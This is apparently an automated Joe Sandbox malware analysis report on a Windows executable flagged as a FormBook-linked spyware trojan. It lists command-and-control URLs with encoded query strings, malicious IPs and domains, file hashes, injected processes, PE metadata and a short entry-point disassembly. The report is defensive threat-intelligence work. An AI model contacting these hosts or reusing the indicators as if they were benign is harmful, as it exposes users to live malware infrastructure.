http://www.goldbracelet.top/3e00/?Ol=yN0LtN-HDTPXX&3h=vcWi2Nuzfs8bFUYHM3WHAx3tRht2hRDvXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhn1cqd0Bfa9GTR6+v7wltgiOCNeedM3Uw1s= | false | Avira URL Cloud: safe | unknown
http://www.startsomething.xyz/9er8/?3h=y0ZQaQGYytoPYKDe8bY9jaat1pADepFe7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaVhngwU9AnEVouJjO4g3krxQAVkSYZ/9aI0=&Ol=yN0LtN-HDTPXX | true | Avira URL Cloud: safe | unknown
http://www.esnafus.online/xmwd/?Ol=yN0LtN-HDTPXX&3h=IE+rnmKnemgDtsiA8D5STAXs+nTDk69pr8eDsUHYy7apDPgh9p40v/i3nAWVLY2hDfLFviaUsm8qLT6zg1+OTK9FmT+L4AChwwgp3/M3yzjoJwJ2lNnYZDs= | true | Avira URL Cloud: safe | unknown
http://www.pku-cs-cjw.top/k3hn/ | true | Avira URL Cloud: safe | unknown
http://www.juewucangku.xyz/b6bc/ | true | Avira URL Cloud: safe | unknown
http://www.sssvip2.shop/cf1q/ | true | Avira URL Cloud: safe | unknown
http://www.startsomething.xyz/9er8/ | true | Avira URL Cloud: safe | unknown
http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g= | true | Avira URL Cloud: safe | unknown
http://www.sssvip2.shop/cf1q/?3h=Au7Zxr9sERBgSOyq6sWX0Xm+S784fSZRk7JANtZrtFINqgeh5LGBoKKy7i8WIDLxVDqalClkjREz1X29sb2m/qDZ/T0gendGAmanUDy32Npyhfc7xsZS61c=&Ol=yN0LtN-HDTPXX | true | Avira URL Cloud: safe | unknown
http://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX | true | Avira URL Cloud: safe | unknown
http://www.opro.vip/3oq9/ | true | Avira URL Cloud: safe | unknown
http://www.esnafus.online/xmwd/ | true | Avira URL Cloud: safe | unknown
http://www.shipley.group/5g1j/?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX | true | Avira URL Cloud: safe | unknown
http://www.santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX | true | Avira URL Cloud: safe | unknown
http://www.santillo.bet/v9ah/ | true | Avira URL Cloud: safe | unknown
http://www.shipley.group/5g1j/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC | wiaacmgr.exe, 00000006.00000002.3561555104.00000000056CC000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003C6C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E | wiaacmgr.exe, 00000006.00000002.3561555104.00000000053A8000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003948000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGD | wiaacmgr.exe, 00000006.00000002.3561555104.0000000005B82000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000004122000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.shipley.group | wdFhguqpcrad.exe, 00000007.00000002.3562519026.00000000056D4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | wiaacmgr.exe, 00000006.00000002.3561555104.000000000553A000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3563035654.0000000007590000.00000004.00000800.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003ADA000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pku-cs-cjw.top/k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9 | wiaacmgr.exe, 00000006.00000002.3561555104.0000000005216000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.00000000037B6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://wanwang.aliyun.com/nametrade/domainshow?domain= | wiaacmgr.exe, 00000006.00000002.3561555104.00000000059F0000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003F90000.00000004.00000001.00040000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
8.136.96.106 | www.juewucangku.xyz | Singapore | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
69.57.163.64 | www.startsomething.xyz | United States | 25653 | FORTRESSITXUS | true
66.235.200.145 | santillo.bet | United States | 13335 | CLOUDFLARENETUS | true
13.248.169.48 | www.shipley.group | United States | 16509 | AMAZON-02US | true
170.33.13.246 | overdue.aliyun.com | Singapore | 134963 | ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimited | false
104.21.36.239 | www.goldbracelet.top | United States | 13335 | CLOUDFLARENETUS | false
104.21.48.233 | www.ausyva4.top | United States | 13335 | CLOUDFLARENETUS | true
156.253.8.115 | www.sssvip2.shop | Seychelles | 132813 | AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK | true
185.199.109.153 | 187370.github.io | Netherlands | 54113 | FASTLYUS | true
199.59.243.228 | www.969-usedcar02.shop | United States | 395082 | BODIS-NJUS | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587863
Start date and time: 2025-01-10 18:49:35 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3HnH4uJtE7.exe (renamed because the original name is a hash value)
Original Sample Name: cb8928597d08e9bb6c3c7ee9df7eb836df1f85a9668054765dd6eb75a33516a3.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@11/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 46
• Number of non-executed functions: 302
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
                                                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
8.136.96.106 | DHL.exe | malicious | FormBook | www.juewucangku.xyz/b6bc/
8.136.96.106 | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | www.juewucangku.xyz/mia8/
69.57.163.64 | DHL.exe | malicious | FormBook | www.startsomething.xyz/9er8/
69.57.163.64 | Salmebogs(1).exe | malicious | FormBook, GuLoader | www.openhorizons.pro/ir2n/
66.235.200.145 | 8t1uarSZFV.exe | malicious | FormBook | www.californiacurrentelectric.com/jd21/?4h6=TcnzKU037ptQb8KtMr1qWerDm92/juweqwVgTbR+hogZZVjE2Gm2LVJlLe3KP85noDUE&tT=MHNp
66.235.200.145 | 6ddrUd6iQo.exe | malicious | FormBook | www.baseinvestments.site/1zzj/
66.235.200.145 | AWB NO. 077-57676135055.exe | malicious | FormBook | www.lakemontbellevue.com/bjbg/
66.235.200.145 | DHL Receipt_AWB#20240079104.exe | malicious | FormBook | www.lakemontbellevue.com/ld28/?3Xd=detQRJhNSOte/MMKAeFCHQdrYsI9TT+LmPx5A1J5xMe4V34+sX8EdyBejeqfNCZfKSqZdnV4VnFNmZ4/AzmN1DMS5R4a1wm07eTy015a8TIqAfj/mBukJiQ=&Cdl=szJ4
66.235.200.145 | INVOICE087667899.exe | malicious | Unknown | heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
66.235.200.145 | 2FcJgghyXg.exe | malicious | FormBook | www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
66.235.200.145 | ClbrTLBbVA.exe | malicious | FormBook | www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
66.235.200.145 | r5573XLX_Confirming_685738_Permiso.vbs | malicious | FormBook | www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
66.235.200.145 | BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbs | malicious | FormBook | www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
66.235.200.145 | GlobalImagingDocuments9575734549684.vbs | malicious | FormBook | www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
13.248.169.48 | KcSzB2IpP5.exe | malicious | FormBook | www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
13.248.169.48 | TU0kiz3mxz.exe | malicious | FormBook | www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
13.248.169.48 | QUOTATION#050125.exe | malicious | FormBook | www.bonheur.tech/t3iv/
13.248.169.48 | QUOTATION#050125.exe | malicious | FormBook | www.bonheur.tech/t3iv/
13.248.169.48 | ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer | www.londonatnight.coffee/13to/
13.248.169.48 | 236236236.elf | malicious | Unknown | portlandbeauty.com/
13.248.169.48 | profroma invoice.exe | malicious | FormBook | www.aktmarket.xyz/wb7v/
13.248.169.48 | SC_TR11670000_pdf.exe | malicious | FormBook | www.xphone.net/i7vz/
13.248.169.48 | RFQ_P.O.1212024.scr | malicious | FormBook | www.krshop.shop/5p01/
13.248.169.48 | SH8ZyOWNi2.exe | malicious | CMSBrute | sharewood.xyz/administrator/index.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
187370.github.io | 4sfN3Gx1vO.exe | malicious | FormBook | 185.199.108.153
187370.github.io | DHL.exe | malicious | FormBook | 185.199.110.153
www.969-usedcar02.shop | DHL.exe | malicious | FormBook | 199.59.243.227
overdue.aliyun.com | DHL.exe | malicious | FormBook | 170.33.13.246
overdue.aliyun.com | Document.exe | malicious | FormBook | 170.33.13.246
overdue.aliyun.com | DPqKF5vqpe.exe | malicious | LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC | 170.33.13.246
overdue.aliyun.com | file.exe | malicious | Unknown | 170.33.13.246
overdue.aliyun.com | BRvptajioG.exe | malicious | RedLine, SmokeLoader, Stealc | 170.33.13.246
overdue.aliyun.com | Payment_Advice.exe | malicious | FormBook | 170.33.13.246
overdue.aliyun.com | SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exe | malicious | Unknown | 170.33.13.246
overdue.aliyun.com | SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exe | malicious | Unknown | 170.33.13.246
overdue.aliyun.com | file.exe | malicious | Phorpiex, Xmrig | 170.33.13.246
overdue.aliyun.com | YSpCB8DEek.exe | malicious | FormBook | 170.33.13.246
www.goldbracelet.top | DHL.exe | malicious | FormBook | 104.21.36.239
www.goldbracelet.top | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | 172.67.201.49
www.goldbracelet.top | 1k24tbb-00241346.exe | malicious | FormBook, PureLog Stealer | 172.67.201.49
www.goldbracelet.top | file.exe | malicious | FormBook, PureLog Stealer | 104.21.36.239
www.ausyva4.top | DHL.exe | malicious | FormBook | 104.21.48.233
www.juewucangku.xyz | DHL.exe | malicious | FormBook | 8.136.96.106
www.juewucangku.xyz | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | 8.136.96.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal | malicious | Unknown | 108.138.26.78
AMAZON-02US | FG5wHs4fVX.exe | malicious | FormBook | 18.143.155.63
AMAZON-02US | KcSzB2IpP5.exe | malicious | FormBook | 13.228.81.39
AMAZON-02US | https://www.depoqq.win/geno | malicious | Unknown | 34.250.141.206
AMAZON-02US | phish_alert_sp2_2.0.0.0 (1).eml | malicious | Unknown | 108.138.26.51
AMAZON-02US | smQoKNkwB7.exe | malicious | FormBook | 18.143.155.63
AMAZON-02US | https://www.shinsengumiusa.com/mrloskie | malicious | Unknown | 3.120.85.61
AMAZON-02US | http://infarmbureau.com | malicious | Unknown | 3.131.211.191
AMAZON-02US | https://cjerichmond.jimdosite.com/ | malicious | Unknown | 3.255.10.234
AMAZON-02US | Setup.exe | malicious | Unknown | 13.32.99.65
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | beacon_x86.exe | malicious | CobaltStrike | 8.148.6.140
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | beacon_x86.exe | malicious | CobaltStrike | 8.148.6.140
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | beacon_x64.exe | malicious | CobaltStrike | 8.148.6.140
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 2873466535874-68348745.02.exe | malicious | Unknown | 118.178.60.103
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | armv5l.elf | malicious | Unknown | 47.116.93.193
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 3.elf | malicious | Unknown | 47.113.16.150
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | armv7l.elf | malicious | Unknown | 8.181.124.11
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | THsSNYblMw.exe | malicious | CobaltStrike, Metasploit | 47.121.190.121
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | Fantazy.sh4.elf | malicious | Unknown | 139.242.78.130
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | Fantazy.ppc.elf | malicious | Unknown | 47.114.96.229
CLOUDFLARENETUS | https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
CLOUDFLARENETUS | eLo1khn7DQ.exe | malicious | MassLogger RAT | 104.21.64.1
CLOUDFLARENETUS | Encrypted_Archive_2025_LHC1W64SMW.html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | MzqLQjCwrw.exe | malicious | MassLogger RAT | 104.21.96.1
CLOUDFLARENETUS | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 104.21.80.1
CLOUDFLARENETUS | SBkuP3ACSA.exe | malicious | Snake Keylogger | 104.21.16.1
CLOUDFLARENETUS | KcSzB2IpP5.exe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | secured File__esperion.com.html | malicious | Phisher | 104.17.25.14
CLOUDFLARENETUS | secured File__esperion.com.html | malicious | Phisher | 104.17.25.14
FORTRESSITXUS | Benefit_401k_2025_Enrollment.pdf | malicious | Unknown | 69.57.162.6
FORTRESSITXUS | miori.spc.elf | malicious | Unknown | 69.72.254.176
FORTRESSITXUS | sh4.nn.elf | malicious | Mirai, Okiru | 208.116.70.219
FORTRESSITXUS | DHL.exe | malicious | FormBook | 69.57.163.64
FORTRESSITXUS | la.bot.mipsel.elf | malicious | Mirai | 65.98.32.221
FORTRESSITXUS | Salmebogs(1).exe | malicious | FormBook, GuLoader | 69.57.163.64
FORTRESSITXUS | http://dimfa.elcompanies.digitalillustra.com | malicious | Unknown | 65.181.111.144
FORTRESSITXUS | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | 69.57.163.227
FORTRESSITXUS | RFQ 3100185 MAHAD.exe | malicious | FormBook | 69.57.163.227
FORTRESSITXUS | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | 69.57.163.227
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\3HnH4uJtE7.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):289280
                                                                  Entropy (8bit):7.994518592457586
                                                                  Encrypted:true
                                                                  SSDEEP:6144:0WBAoEs4XpTTQ0MeUcfTIAvXst919f2lnJotSgZm89:/BfGubcfTIAPsnwKogZN9
                                                                  MD5:74432259BF5893C866138E3F6F4A795E
                                                                  SHA1:9C604E15501E462FBB3DFA482CE21F35C20D32E8
                                                                  SHA-256:0619895F80E34FFFA96BC3A207F7AF32433DFFD277FCB91CE071BEC1A41499B3
                                                                  SHA-512:ED2F9876C8E7412F95129AEBF3A4CF564A7D201B2D31A832AAE169126CE7714ED385EF9EC005D59CE3CF97D99963FDD178FE4B75497537CCFAD8E187E02CD470
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Windows\SysWOW64\wiaacmgr.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.103986593999411
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:3HnH4uJtE7.exe
                                                                  File size:1'401'344 bytes
                                                                  MD5:b88bab75a48b9fefcd3395afa9891d69
                                                                  SHA1:d35d41a4330b17b8518204a483b8f4800012718a
                                                                  SHA256:cb8928597d08e9bb6c3c7ee9df7eb836df1f85a9668054765dd6eb75a33516a3
                                                                  SHA512:f33af8ebb3ec7e82bb901637656cc0f17d326fa343b4df62631cc8a5cc37f9b1f8c45db7b9d55da8f5f007999fc38232f262cebc04799e93300f462bd4405764
                                                                  SSDEEP:24576:ZqDEvCTbMWu7rQYlBQcBiT6rprG8aVFfrXBnHVzuvz/CecYHYbi3:ZTvC/MTQYxsWR7aVVXxFGLCGHj
                                                                  TLSH:2C55C00277818062FFAB9B320B56E611467D7E262933F51F17983879BB721F1063E663
                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                  Icon Hash:0d61030111110104
                                                                  Entrypoint:0x420577
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67622C3C [Wed Dec 18 01:58:20 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                                                  Instruction
                                                                  call 00007F99087CE213h
                                                                  jmp 00007F99087CDB1Fh
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  push dword ptr [ebp+08h]
                                                                  mov esi, ecx
                                                                  call 00007F99087CDCFDh
                                                                  mov dword ptr [esi], 0049FDF0h
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  and dword ptr [ecx+04h], 00000000h
                                                                  mov eax, ecx
                                                                  and dword ptr [ecx+08h], 00000000h
                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  push dword ptr [ebp+08h]
                                                                  mov esi, ecx
                                                                  call 00007F99087CDCCAh
                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  and dword ptr [ecx+04h], 00000000h
                                                                  mov eax, ecx
                                                                  and dword ptr [ecx+08h], 00000000h
                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  mov esi, ecx
                                                                  lea eax, dword ptr [esi+04h]
                                                                  mov dword ptr [esi], 0049FDD0h
                                                                  and dword ptr [eax], 00000000h
                                                                  and dword ptr [eax+04h], 00000000h
                                                                  push eax
                                                                  mov eax, dword ptr [ebp+08h]
                                                                  add eax, 04h
                                                                  push eax
                                                                  call 00007F99087D08BDh
                                                                  pop ecx
                                                                  pop ecx
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  lea eax, dword ptr [ecx+04h]
                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                  push eax
                                                                  call 00007F99087D0908h
                                                                  pop ecx
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  mov esi, ecx
                                                                  lea eax, dword ptr [esi+04h]
                                                                  mov dword ptr [esi], 0049FDD0h
                                                                  push eax
                                                                  call 00007F99087D08F1h
                                                                  test byte ptr [ebp+08h], 00000001h
                                                                  pop ecx
                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x7f760 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x154000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
